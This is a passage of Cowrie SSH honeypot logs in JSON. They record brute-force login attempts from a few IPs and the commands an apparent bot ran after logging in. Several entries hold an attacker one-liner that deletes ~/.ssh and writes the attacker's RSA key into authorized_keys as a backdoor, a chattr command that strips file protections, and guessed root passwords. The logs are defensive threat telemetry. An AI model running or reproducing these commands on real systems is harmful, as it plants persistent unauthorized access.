AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:20:46.627650Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:20:46.997442Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:46.998335Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50704,"dst_ip":"1.2.3.4","dst_port":22,"session":"38d7b865927a","protocol":"ssh","message":"New connection: 212.227.235.229:50704 (1.2.3.4:22) [session: 38d7b865927a]","sensor":"my-vps","timestamp":"2025-09-09T06:20:47.417547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:47.418338Z","src_ip":"212.227.235.229","session":"38d7b865927a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:47.788286Z","src_ip":"212.227.235.229","session":"38d7b865927a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:20:49.283338Z","src_ip":"212.227.235.229","session":"38d7b865927a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:50.629223Z","src_ip":"212.227.235.229","session":"38d7b865927a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51623,"dst_ip":"1.2.3.4","dst_port":22,"session":"1002e4397545","protocol":"ssh","message":"New connection: 212.227.235.229:51623 (1.2.3.4:22) [session: 1002e4397545]","sensor":"my-vps","timestamp":"2025-09-09T06:20:50.979129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:20:50.980173Z","src_ip":"212.227.235.229","session":"1002e4397545"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:20:51.373045Z","src_ip":"212.227.235.229","session":"1002e4397545"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:52.795800Z","src_ip":"212.227.235.229","session":"1002e4397545"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:53.136369Z","src_ip":"212.227.235.229","session":"0dbfd24723cb"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:53.140018Z","src_ip":"212.227.235.229","session":"1002e4397545"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":57940,"dst_ip":"1.2.3.4","dst_port":22,"session":"bff8166f4477","protocol":"ssh","message":"New connection: 92.118.39.62:57940 (1.2.3.4:22) [session: bff8166f4477]","sensor":"my-vps","timestamp":"2025-09-09T06:20:54.756590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:20:54.757522Z","src_ip":"92.118.39.62","session":"bff8166f4477"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:20:54.786986Z","src_ip":"92.118.39.62","session":"bff8166f4477"}
{"eventid":"cowrie.login.failed","username":"cassandra","password":"cassandra123","message":"login attempt [cassandra/cassandra123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:20:54.877033Z","src_ip":"92.118.39.62","session":"bff8166f4477"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:55.909113Z","src_ip":"92.118.39.62","session":"bff8166f4477"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55338,"dst_ip":"1.2.3.4","dst_port":22,"session":"7610a77c9c1d","protocol":"ssh","message":"New connection: 212.227.235.229:55338 (1.2.3.4:22) [session: 7610a77c9c1d]","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.256893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.260118Z","src_ip":"212.227.235.229","session":"7610a77c9c1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.370334Z","src_ip":"212.227.235.229","session":"7610a77c9c1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34214,"dst_ip":"1.2.3.4","dst_port":22,"session":"0af52790dc3d","protocol":"ssh","message":"New connection: 212.227.235.229:34214 (1.2.3.4:22) [session: 0af52790dc3d]","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.439740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.440476Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.655124Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.login.failed","username":"ibrahim","password":"ibrahim1234","message":"login attempt [ibrahim/ibrahim1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:20:58.815121Z","src_ip":"212.227.235.229","session":"7610a77c9c1d"}
{"eventid":"cowrie.login.success","username":"root","password":"PA$$WORD@2020","message":"login attempt [root/PA$$WORD@2020] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:20:59.555596Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:20:59.927732Z","src_ip":"212.227.235.229","session":"7610a77c9c1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:00.036826Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:00.037514Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:21:00.038700Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:00.255327Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:21:00.737730Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:21:00.738415Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:21:00.955378Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:00.956241Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34924,"dst_ip":"1.2.3.4","dst_port":22,"session":"61a962354cb8","protocol":"ssh","message":"New connection: 212.227.235.229:34924 (1.2.3.4:22) [session: 61a962354cb8]","sensor":"my-vps","timestamp":"2025-09-09T06:21:01.169787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:01.170403Z","src_ip":"212.227.235.229","session":"61a962354cb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:01.386471Z","src_ip":"212.227.235.229","session":"61a962354cb8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:02.289803Z","src_ip":"212.227.235.229","session":"61a962354cb8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:03.507457Z","src_ip":"212.227.235.229","session":"61a962354cb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35536,"dst_ip":"1.2.3.4","dst_port":22,"session":"d99754d6f4dc","protocol":"ssh","message":"New connection: 212.227.235.229:35536 (1.2.3.4:22) [session: d99754d6f4dc]","sensor":"my-vps","timestamp":"2025-09-09T06:21:03.721578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:21:03.722742Z","src_ip":"212.227.235.229","session":"d99754d6f4dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:21:03.937756Z","src_ip":"212.227.235.229","session":"d99754d6f4dc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:21:04.840405Z","src_ip":"212.227.235.229","session":"d99754d6f4dc"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:05.057681Z","src_ip":"212.227.235.229","session":"0af52790dc3d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:05.058594Z","src_ip":"212.227.235.229","session":"d99754d6f4dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53855,"dst_ip":"1.2.3.4","dst_port":22,"session":"684e4c0d269f","protocol":"ssh","message":"New connection: 212.227.235.229:53855 (1.2.3.4:22) [session: 684e4c0d269f]","sensor":"my-vps","timestamp":"2025-09-09T06:21:05.313893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:21:05.314617Z","src_ip":"212.227.235.229","session":"684e4c0d269f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:21:05.727458Z","src_ip":"212.227.235.229","session":"684e4c0d269f"}
{"eventid":"cowrie.login.failed","username":"csgo","password":"1234567","message":"login attempt [csgo/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T06:21:07.604461Z","src_ip":"212.227.235.229","session":"684e4c0d269f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:21:09.032491Z","src_ip":"212.227.235.229","session":"684e4c0d269f"}
